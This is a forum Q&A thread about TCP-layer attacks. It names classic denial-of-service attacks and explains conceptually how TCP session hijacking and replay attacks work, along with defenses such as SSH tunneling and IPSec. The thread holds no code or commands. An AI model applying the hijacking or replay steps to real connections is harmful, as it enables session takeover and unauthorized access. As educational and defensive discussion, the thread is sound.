what are possible TCP layer attacks?

       TCP uses checksum for data and header. Then how can adversary modifies packet and send it to its intended destination?
        For IP adversary can change values in IP header and rebuild checksum field and fill it in IP header but what about TCP checksum and data?
         Does that mean there is no TCP data hacking/modifying attack in world?
      which are TCP layer attacks are there in world except SYN attack?
Who is Participating?
DonConsolioConnect With a Mentor Commented:
For a nice overview of some TCP attacks read
"TCP Exploits" by Prabhaker Mateti at:
David PiniellaCommented:
>> which are TCP layer attacks are there in world except SYN attack?

smurf, bonk, boink, ping of death, teardrop, fraggle, hijacking, DDoS.


TCP checksums are not meant as protection aghainst attacks,
but as a protection aghainst bad comm lines, modems, etc.

The algorithm is simple and well documented and simple, so
ist is no problem to modify any intercepted packet, then re-calc
the checksum and send the packet to the victim.
macker-Connect With a Mentor Commented:
In order to hijaack a TCP connection, two things need to be accomplished:

1) You need to be able to use the correct TCP sequence number for the next packet, and then send this packet with the correct source address
  The connection is now hijaacked; the client's TCP sequence number is out of sequence, so their session is no longer valid, and packets from them will be ignored.  Unless you are a man-in-the-middle, or otherwise able to intercept replies, this will be a blind attack, and probably most suited to TCP replay attacks.

2) Now that you've hijaacked the connection and are able to send new packets of data to the remote host using the correct sequence numbers, which will continue to increment, you need to preserve the session so that it continues.  The original (victim) host will continue to receive packets from the destination, in reply to your forged packets... when it sees these, but has already invalidated the session (sequence numbers no longer matching and all), RST packets are going to be sent back and forth, and possibly ICMP Port Inreachable messages as well.  You'll need to supress any network output from the originating host to  prevent the original (victim) host from sending these packets, which could cause the hijaacked session to terminate.

TCP replay attacks are the second type of attack that seems to meet your qualifications.  In short, if you've already captured a session in the past, you can resend the packets to the destination host.  Again, this is a blind attack (unless playing man-in-the-middle), and would be for purposes such as activating an authentication mechanism.  E.g. if a remote host allows SMTP traffic after you've authenticated via POP, a TCP replay attack could be used to resend the packets to authenticate the POP session, thus opening up the SMTP service.  This is a hypothetical example, and ignores the fact that extracting the POP password from the already-known traffic would be easier.

In both cases, network connections should be secured from monitoring and man-in-the-middle attacks.  SSH tunneling, IPSec and other VPN-type links can be used with great benefit.  Services should have protocol-layer mechanisms to establish per-session cryptography, tokens, timestamps, etc. to prevent replay attacks and to prevent hijaacking.

Other attacks typically involve sending unexpected data to a remote host for the purposes of buffer overflows and various DoS purposes.  This can be in the form of oversized packets, unexpected contents, manipulation of packet flags, etc.  This is usually at the protocol level, but can sometimes be a low-level packet issue that exploits issues in the TCP stack.  E.g. the "ssping" or "jolt" attack was an oversized ICMP Echo (Ping) packet.
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

All Courses

From novice to tech pro — start learning today.